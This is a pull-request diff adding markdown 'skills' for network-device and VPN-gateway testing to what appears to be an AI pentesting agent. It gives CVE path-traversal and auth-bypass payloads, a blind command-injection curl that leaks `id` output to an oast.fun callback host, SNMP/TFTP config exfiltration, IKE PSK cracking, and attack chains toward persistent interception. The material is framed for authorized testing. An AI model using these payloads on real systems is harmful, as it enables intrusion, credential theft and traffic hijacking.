+katana -u https://203.0.113.10:10443 -jc -d 2 -silent
+```
+
+```bash
+# OAST oracle for blind command-injection / SSRF in appliance CVEs
+interactsh-client -v          # gives a fresh *.oast.fun; embed in injection payloads, watch for callbacks
+
+# TFTP config pull/push (legacy push-config endpoints, Smart Install)
+atftp --get -r running-config -l pulled.conf 203.0.113.10   # or run a TFTP listener for SNMP-RW exfil
+
+# Credential discovery in any exfiltrated config or firmware image
+gitleaks detect --no-git -s ./extracted_config -v
+trufflehog filesystem ./firmware_unpacked --only-verified
+binwalk -e firmware.bin       # unpack vendor firmware to inspect web roots, hardcoded creds, keys
+```
+
+Install-as-needed: `pip3 install impacket routersploit`; `apt-get install -y snmp snmp-mibs-downloader onesixtyone ike-scan atftp binwalk`; `go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest`; RouterSploit for vendor exploit/scanner modules (`use scanners/autopwn`); `git clone https://github.com/frostbits-security/SIET` for Cisco Smart Install; hashcat for offline hash cracking of recovered config secrets.
+
+## Methodology
+
+1. **Locate the device and management plane.** From the authorized scan position, map every reachable port. Anything that is a management protocol (SSH/Telnet/HTTPS-admin/SNMP/NETCONF) reachable from an untrusted segment is itself the first finding.
+2. **Fingerprint exactly.** Resolve vendor + model + firmware version. SNMP `sysDescr`, HTTPS title/favicon hash, SSH host-key/banner, IKE vendor IDs, and TLS cert CN all converge on a precise build. The firmware version drives the CVE list — guessing the vendor is not enough.
+3. **Map version to known CVEs.** Cross-reference the firmware build against CISA KEV and vendor PSIRT advisories. Edge VPN/firewall CVEs (auth-bypass, path-traversal-to-RCE, command injection) dominate. Drive nuclei with vendor tags.
+4. **Test management exposure.** Try default and vendor-documented credentials; check for unauthenticated admin endpoints; assess SNMP community strength (read and write).
+5. **Test protocol-level weaknesses.** SNMP write, IKE aggressive-mode PSK capture, Smart Install, unauthenticated routing protocol participation, TFTP config pull.
+6. **Validate one high-impact path** with a minimal, non-destructive PoC and stop at proof.
+
+## Key Weaknesses / Techniques
+
+- **Default / weak credentials**: `admin/admin`, `cisco/cisco`, `admin/<blank>`, MikroTik `admin/<blank>`, Ubiquiti `ubnt/ubnt`. Validate manually before any guarded automation; never lockout-bomb production AAA.
+- **Exposed management UI + auth bypass CVEs** (the dominant class):
+  - Citrix ADC/Gateway path traversal: `GET /vpn/../vpns/cfg/smb.conf` (CVE-2019-19781); newer auth-bypass on `/oauth/idp/.well-known/...` (CVE-2023-3519 RCE).
+  - Fortinet FortiOS SSL-VPN path traversal `GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession` (CVE-2018-13379) and admin auth-bypass (CVE-2022-40684) via crafted `Forwarded`/`X-Forwarded-For` to the REST API.
+  - PAN-OS GlobalProtect command injection / auth-bypass (CVE-2024-3400 `SESSID` path-traversal-to-RCE).
+  - F5 BIG-IP iControl REST auth-bypass (CVE-2022-1388, CVE-2023-46747) and TMUI RCE.
+  - Validate with the matching nuclei template rather than free-handing payloads:
+    ```bash
+    nuclei -u https://203.0.113.10:10443 -id CVE-2022-40684,CVE-2023-3519,CVE-2018-13379,CVE-2024-3400,CVE-2022-1388 -silent
+    ```
+- **SNMP misconfiguration**: a read community leaks the full topology and (with `1.3.6.1.4.1.9.9.96` on Cisco) a write community can trigger a TFTP config upload to your listener, exposing every embedded secret.
+- **IKE aggressive mode**: the responder returns a hash of the PSK before authentication; capture with `ike-scan -A` and crack offline (`psk-crack psk.txt`).
+- **Cisco type-7 passwords** in any obtained config are trivially reversible; type-5/8/9 are crackable offline with hashcat (`-m 500/9200/9300`).
+- **Unauthenticated services**: Smart Install (4786) on legacy IOS allows config read/replace and IOS image swap; unauthenticated routing protocol injection (OSPF/BGP/HSRP) lets you reroute or blackhole traffic.
+- **Stale/weak TLS & SSH**: SSLv3/TLS1.0, RSA-1024 host keys, CBC-only ciphers indicate old firmware and weak transport — corroborating evidence, escalate to CVE checks.
+- **MikroTik RouterOS**: Winbox (8291) info-leak/auth-bypass (CVE-2018-14847) reads `/rw/store/user.dat` and recovers admin credentials; check RouterOS version via Winbox or `/nova` API. CVE-2023-30799 (Jet) escalates to root from admin.
+- **Blind command injection**: for appliance CVEs where output is not returned, inject an OAST callback to confirm execution before claiming RCE:
+  ```bash
+  # example: confirm execution via DNS callback (no data destruction)
+  curl -sk "https://203.0.113.10:443/<vuln-endpoint>" --data 'cmd=nslookup $(id | tr " " .).abc123.oast.fun'
+  # then watch interactsh-client stdout for the inbound hit
+  ```
+- **NETCONF/RESTCONF over default creds**: `ssh -s -p830 admin@203.0.113.10 netconf` then send a `<get-config>` RPC; RESTCONF `GET /restconf/data/...` with default auth dumps running config as JSON/XML.
+
+## Validation
+
+- Confirm the **exact firmware build** (SNMP sysDescr, UI version banner, or post-auth `show version`) before claiming a version-based CVE — fingerprint guesses are not findings.
+- For auth-bypass/RCE CVEs, demonstrate a benign primitive: read a non-sensitive file via path traversal, or run an identity command (`whoami`/`get system status`) and capture the response. Do not modify config, write files, or reboot.
+- For SNMP, show a single sysName/interface read with the discovered community; for write, prove write capability against a harmless OID rather than pulling the full config unless the engagement requires it.
+- For default creds, log in once, screenshot the privileged dashboard, and log out — no config changes.
+- Capture the raw request/response (or tool output) and the precise CVE ID / OID / credential pair so the finding is independently reproducible.
+
+## False Positives
+
+- **Version banner ≠ vulnerable**: many CVEs need a specific feature enabled (SSL-VPN configured, GlobalProtect portal up, iControl exposed). A matched banner without the vulnerable feature is informational.
+- **Vendor backports**: appliances often carry patched builds whose version string still looks old; trust active PoC over version inference.
+- **Honeypots / decoy banners**: a "Cisco" telnet banner on an odd port with no corroborating SNMP/TLS/SSH evidence may be a deception appliance.
+- **`public` community that is read-only and exposes only sysDescr** is low severity, not config disclosure — verify what the OID tree actually returns.
+- **Self-signed cert / weak cipher alone** is a hygiene issue, not exploitation; do not inflate severity.
+- **Rate-limited login that returns generic errors** is not a credential-validity oracle — avoid false "valid creds" claims.
+
+## Chaining & Impact
+
+- Exposed mgmt UI + auth-bypass/RCE → device admin → **full config dump** → embedded RADIUS/TACACS+/SNMP/IPsec secrets → lateral movement into AAA and adjacent devices.
+- SNMP-RW → TFTP config exfil → crack type-5/8/9 hashes → reuse credentials org-wide.
+- Firewall/VPN compromise → add an admin account or VPN user, modify ACLs/NAT, enable a port-mirror/SPAN or GRE tunnel → **persistent traffic interception** and a pivot into internal segments.
+- Router compromise → BGP/OSPF route injection → traffic redirection, blackhole, or man-in-the-middle.
+- Edge appliance RCE → underlying Linux/BSD shell → credential harvest from running config and disk → deeper network compromise. These chains are why perimeter network devices are the top-exploited KEV category.
+
+## Pro Tips
+
+- Always pin firmware version first; the CVE list collapses to a handful once you know the exact build, and you avoid noisy untargeted scanning.
+- IKE aggressive mode is a quiet, high-yield offline-crack path that bypasses login lockouts entirely — check it before touching the SSL-VPN login form.
+- The config file is the real prize, not the shell: it hands you downstream and AAA credentials. Prioritize any path that yields config read (SNMP-RW, Smart Install, path traversal) over pure RCE.
+- Throttle and never brute-force against TACACS+/RADIUS-backed logins — you will lock out real admins and trip SOC alerts; validate single known/default pairs only.
+- Treat any management interface reachable from the Internet as critical on its own; the CVE is often just the confirmation, the exposure is the finding.
+- favicon hashes (`httpx -favicon`) reliably fingerprint Citrix/Fortinet/PAN portals even when titles and headers are stripped.
+- Edge-device CVEs move fast; when a build looks recent, query the vendor PSIRT / CISA KEV before concluding it is safe.

--- a/strix/skills/network/vpn_gateway.md
+++ b/strix/skills/network/vpn_gateway.md
@@ -1,0 +1,152 @@
+---
+name: vpn_gateway
+description: VPN / remote access gateway testing - fingerprinting, known-CVE validation, auth exposure, and pre-auth RCE chains
+---
+
+# VPN / Remote Access Gateway
+
+VPN and remote-access gateways (Ivanti Connect Secure/Pulse, Fortinet FortiGate SSL-VPN, Citrix NetScaler/ADC Gateway, Cisco ASA/AnyConnect, Palo Alto GlobalProtect, SonicWall SMA/NSA, OpenVPN Access Server, WireGuard front-ends) sit on the network perimeter and terminate untrusted inbound traffic, then bridge it into the internal network. They are high-value because a single pre-auth flaw yields a foothold inside the trust boundary, and because they hold credentials, session tokens, and routing into protected segments. The attacker objective is to fingerprint the exact product and build, validate any applicable known CVE, and probe authentication surfaces (web portal, IKE/IPsec, captive endpoints) for bypass, credential abuse, or pre-auth code execution that turns the appliance into a pivot.
+
+## Attack Surface
+
+**Exposed services**
+- TCP 443 / 10443 / 8443 - SSL-VPN web portal, admin UI, AnyConnect/GlobalProtect/FortiClient endpoints
+- UDP 500 / 4500 - IKEv1/IKEv2 and IPsec NAT-T (aggressive mode, vendor ID leaks)
+- UDP 1194 / TCP 1194 - OpenVPN
+- UDP 51820 - WireGuard
+- TCP 1723 + GRE (proto 47) - legacy PPTP
+- TCP 22 / 8443 / custom - appliance management plane, REST/XML API
+
+**Entry points**
+- Unauthenticated portal endpoints (login, EPA/host-checker, language files, error pages, SAML ACS)
+- Vendor API paths (`/remote/`, `/dana-na/`, `/api/v1/`, `/global-protect/`, `/+CSCOE+/`)
+- IKE handshake (no auth required to negotiate phase 1, leaks fingerprint and sometimes usernames)
+- Client provisioning / auto-update channels (FortiClient, AnyConnect downloader, profile XML)
+
+**What is exposed**
+- Product, version, and patch level via banners, TLS certs, JS asset hashes, and HTTP headers
+- User enumeration via timing and distinct error strings on login / IKE aggressive mode
+- Session cookies (`DSID`, `webvpn`, `SVPNCOOKIE`, `PHPSESSID`) that may be replayable
+- Backup configs, system logs, and `/etc/passwd`-equivalents via path traversal in known CVEs
+
+## Recon & Enumeration
+
+```
+# Service/port discovery (TCP + key UDP)
+naabu -host gw.target.tld -p 443,10443,8443,4443,22,1194,1723 -silent -o ports.txt
+nmap -Pn -sS -sU -p T:443,10443,8443,22,1723,U:500,4500,1194,51820 -sV --version-all gw.target.tld -oA vpn_scan
+
+# IKE/IPsec fingerprint (aggressive mode leaks vendor + sometimes user)
+ike-scan -M gw.target.tld
+ike-scan --aggressive --id=testgroup -P psk.hash gw.target.tld   # capture PSK hash for offline crack
+
+# TLS + HTTP fingerprint of the portal
+httpx -u https://gw.target.tld:443 -title -tech-detect -status-code -tls-grab -favicon -jarm -o httpx.txt
+echo | openssl s_client -connect gw.target.tld:443 2>/dev/null | openssl x509 -noout -subject -issuer -dates
+
+# Identify vendor-specific endpoints
+ffuf -u https://gw.target.tld/FUZZ -w vpn_paths.txt -mc 200,301,302,401,403 -fs 0
+# vpn_paths.txt: dana-na/auth/url_default/welcome.cgi, remote/login, remote/fgt_lang,
+#   global-protect/login.esp, +CSCOE+/logon.html, cgi-bin/welcome, api/v1/totp/user-backup-code
+
+# Spider portal for build hashes / version strings
+katana -u https://gw.target.tld -jc -d 2 -o katana.txt
+```
+
+Asset-specific tooling install (Kali):
+- `apt-get install -y ike-scan` - IKE/IPsec enumeration and PSK capture
+- `pip install scapy` - custom IKE/ESP packet crafting
+- `git clone https://github.com/SpiderLabs/ikeforce && pip install -r ikeforce/requirements.txt` - IKE aggressive-mode user enumeration and PSK brute
+- `hashcat -m 5300/5400` - crack IKE aggressive-mode PSK hashes (no extra install in Kali)
+
+```
+# CVE + misconfig sweep with version-aware templates
+nuclei -u https://gw.target.tld -tags fortinet,ivanti,pulse,citrix,cisco,sonicwall,paloalto -s critical,high -j -o nuclei_vpn.jsonl
+nuclei -u https://gw.target.tld -as -s critical,high -rl 30 -c 10 -bs 10 -timeout 10 -retries 1 -j -o nuclei_auto.jsonl
+
+# WAF / reverse-proxy in front of the appliance
+wafw00f https://gw.target.tld
+```
+
+## Methodology
+
+1. **Map exposure** - `naabu`/`nmap` the gateway for the SSL-VPN port set and IKE UDP ports; confirm what is actually reachable versus filtered.
+2. **Fingerprint precisely** - Pull the TLS cert CN/SAN, favicon hash, JS/CSS asset hashes, HTTP `Server`/`Set-Cookie` patterns, and vendor endpoints. Cross-reference the favicon hash and welcome-page build string to nail the exact major.minor.patch. IKE vendor-ID payloads independently confirm the product.
+3. **Pin the build to CVEs** - Map the resolved version to advisories (FortiOS, Ivanti ICS, NetScaler, ASA/FTD, PAN-OS, SMA). Prefer pre-auth and version-gated CVEs. Validate with targeted `nuclei` templates before any exploitation.
+4. **Probe authentication exposure** - Test the login flow for user enumeration, default/weak creds, missing lockout, MFA placement, and SAML/OIDC trust issues. Run IKE aggressive mode to capture PSK hashes and enumerate group/user IDs.
+5. **Test pre-auth endpoints** - Hit language-file, host-checker, error, and API endpoints for path traversal, auth bypass, and template/command injection that known CVEs exploit.
+6. **Validate, do not assume** - Confirm each candidate with a non-destructive PoC (read a benign file, observe a version-distinct response, capture a hash). Avoid web-shell drops; demonstrate reach instead.
+7. **Assess session handling** - Check cookie scope, fixation, and replay; verify whether a captured session token works from a different IP/UA.
+8. **Establish impact / pivot** - From a valid session or pre-auth read, demonstrate access to internal routes, config secrets, or credential material, then stop at proof.
+
+## Key Weaknesses / Techniques
+
+### Known-CVE pre-auth RCE / file read (validate the build first)
+- **Ivanti Connect Secure** CVE-2023-46805 + CVE-2024-21887 (auth bypass + command injection, `/api/v1/totp/user-backup-code`), CVE-2025-0282 (stack overflow pre-auth RCE). Probe: `curl -sk 'https://gw/api/v1/totp/user-backup-code/../../system/system-information'` and check for an authenticated response without a session.
+- **Fortinet FortiOS SSL-VPN** CVE-2022-42475 / CVE-2023-27997 (pre-auth heap overflow). Banner-pin the FortiOS build; validate with the vendor-specific nuclei template, not by crashing the device.
+- **Citrix NetScaler** CVE-2023-3519 (pre-auth RCE) and CVE-2023-4966 "Citrix Bleed" (session token leak via oversized `Host`/buffer in `/oauth/idp/.well-known/openid-configuration`). Citrix Bleed PoC: send the crafted request and inspect the response for leaked `NSC_AAAC`/session material.
+- **Cisco ASA/FTD** CVE-2020-3452 (WebVPN path traversal, unauth file read): `curl -sk 'https://gw/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions'`.
+- **Palo Alto GlobalProtect** CVE-2024-3400 (command injection via `SESSID` cookie path traversal in telemetry). CVE-2019-1579 (format-string in `sslmgr`).
+
+```
+# Example: Cisco ASA unauth path-read validation (read a known static resource only)
+curl -sk "https://gw.target.tld/+CSCOU+/../+CSCOE+/files/file_list.json?path=/+CSCOE+/portal_inc.lua"
+
+# Confirm a version-gated CVE without exploitation
+nuclei -u https://gw.target.tld -t http/cves/2023/CVE-2023-4966.yaml -j -o citrixbleed.jsonl
+```
+
+### Authentication exposure
+- **User enumeration**: distinct login error strings or response timing for valid vs invalid users; IKE aggressive mode returns a hash only for valid group/user IDs.
+- **Missing lockout / weak creds**: rate-limited but unbounded login attempts; test default vendor creds (admin/admin, admin/<blank>, maintenance accounts) before any brute force, and only against an authorized account.
+- **MFA placement flaws**: MFA enforced on the UI but not on the API or thick-client provisioning endpoint; or MFA bypassable by replaying a pre-MFA session cookie.
+- **SAML/OIDC trust**: unsigned/altered assertions accepted at the ACS, audience/recipient not validated, or IdP-initiated flows allowing assertion replay. See the authentication_jwt skill for token tampering.
+
+```
+# IKE aggressive-mode user/PSK enumeration
+python3 ikeforce/ikeforce.py -e -w users.txt gw.target.tld     # enumerate valid group/user IDs
+ike-scan --aggressive --id=valid_group -P psk.txt gw.target.tld # capture PSK hash
+hashcat -m 5300 psk.txt /usr/share/wordlists/rockyou.txt        # offline PSK crack (authorized)
+```
+
+### Path traversal / LFI in portal endpoints
+- Language-pack, theme, and host-checker parameters frequently allow `../` traversal to read configs and session DBs (see CVE list above). Test with encoded traversal (`..%2f`, `..%252f`, `....//`).
+
+### Information disclosure
+- Backup config download, verbose error pages leaking internal hostnames/IPs, debug endpoints, and client profile XML exposing internal DNS, split-tunnel routes, and RADIUS server addresses.
+
+## Validation
+
+1. **Fingerprint proof** - Capture the exact build (TLS cert + favicon hash + welcome-page version string + IKE vendor ID agreeing) so the CVE mapping is defensible.
+2. **CVE proof** - For file-read CVEs, retrieve a benign, version-distinct file (a vendor static asset or a config key that should not be public) and show it could not be obtained unauthenticated by design. For Citrix Bleed, show the leaked session token bytes in the response.
+3. **Auth-bypass proof** - Demonstrate an authenticated-only API response returned without a valid session, or a session cookie minted without completing MFA, and confirm it grants portal access.
+4. **PSK/credential proof** - Show a captured IKE aggressive-mode hash and (if authorized) a cracked PSK that completes phase 1, or a default credential that logs in.
+5. **Reproducibility** - Record the exact request (method, path, headers, cookie) and the distinguishing response field. Re-run to confirm it is stable, not a transient 5xx.
+
+## False Positives
+
+- A vendor nuclei template firing on **banner/version alone** when the build is actually patched (backported fix keeps the version string). Confirm with a behavioral check, not the version banner.
+- 401/403 on a CVE endpoint means the auth bypass did **not** work - the appliance is responding correctly.
+- A WAF or reverse proxy returning a vendor-looking page; the real appliance may be patched or absent. `wafw00f` and `jarm` help distinguish edge from origin.
+- IKE returning a response to any ID (some stacks reply uniformly) - not user enumeration unless valid vs invalid responses differ.
+- Login timing differences caused by network jitter rather than backend logic; require a consistent, statistically separated delta across many samples.
+- Self-signed cert or default hostname is a hygiene note, not a vulnerability by itself.
+
+## Chaining & Impact
+
+- **Pre-auth file read -> session theft -> full VPN access**: Citrix Bleed / Ivanti traversal leaks an active session token; replay it to enter the internal network as a legitimate user, bypassing MFA entirely.
+- **Pre-auth RCE -> appliance foothold -> pivot**: FortiOS/NetScaler/Ivanti pre-auth code execution gives a shell on the perimeter device with routes into protected segments; from there enumerate internal hosts (see nmap/naabu) and reach domain controllers and metadata endpoints (see ssrf skill).
+- **IKE PSK crack -> IPsec tunnel**: a cracked aggressive-mode PSK plus a valid credential establishes a full tunnel, granting the same access as a trusted remote worker.
+- **Config / credential disclosure -> lateral movement**: leaked client profiles and backup configs reveal internal DNS, RADIUS/LDAP servers, and split-tunnel routes that scope follow-on attacks. Harvested LDAP/RADIUS creds enable Active Directory access.
+- **Persistence**: appliance compromise frequently survives reboots and patching if web-shells or implants are planted - in authorized testing, demonstrate reach and stop; do not install persistence.
+
+## Pro Tips
+
+1. Pin the build with **multiple independent signals** (TLS cert, favicon hash, JS asset hash, IKE vendor ID) before mapping CVEs - version strings lie after backported patches.
+2. IKE **aggressive mode** is the highest-signal unauthenticated probe: it leaks vendor, often valid group/user IDs, and a crackable PSK hash without touching the web portal.
+3. The thick-client and API endpoints are frequently **less hardened** than the browser portal - test MFA and rate-limiting there, not just on the HTML login.
+4. Many gateway CVEs are **version-gated path traversals**; reach for `..%252f` (double-encoding) and `....//` when single `../` is filtered.
+5. Distinguish **edge from origin**: a CDN/WAF can mask both the real product and its patch level; correlate `jarm`, cert chain, and timing.
+6. Validate destructively-classed CVEs (heap/stack overflow RCE) with **vendor-published detection templates**, never by sending a crash payload against production.
+7. A leaked **active session token** is more valuable and quieter than RCE - it inherits the user's MFA-completed trust; prioritize session-leak CVEs for clean proof.
+8. Check the **client auto-update / provisioning** channel - poisoned profiles and update endpoints can be a supply-chain path to every connecting endpoint.


### PR DESCRIPTION
## What

Adds deep per-asset methodology **skills** for Network/perimeter asset types.

Part of the asset-coverage effort (foundation in #533, which adds the asset taxonomy + detection + recommended-skill hooks). These files provide the deep methodology each asset type's recommendation points at.

## Skills added

- `strix/skills/network/asn.md`
- `strix/skills/network/cdn_edge.md`
- `strix/skills/network/cidr.md`
- `strix/skills/network/dns_infrastructure.md`
- `strix/skills/network/ip_address.md`
- `strix/skills/network/network_device.md`
- `strix/skills/network/vpn_gateway.md`

## Notes

- Markdown only; no code changes. Auto-discovered by the skills loader (`get_available_skills` / `load_skills`), so they appear in `available_skills` and are loadable via `load_skill` or `create_agent(skills=[...])`.
- Each follows the house template/tone (cf. `vulnerabilities/ssrf.md`).
- No filename overlap with #532 (complementary asset coverage).
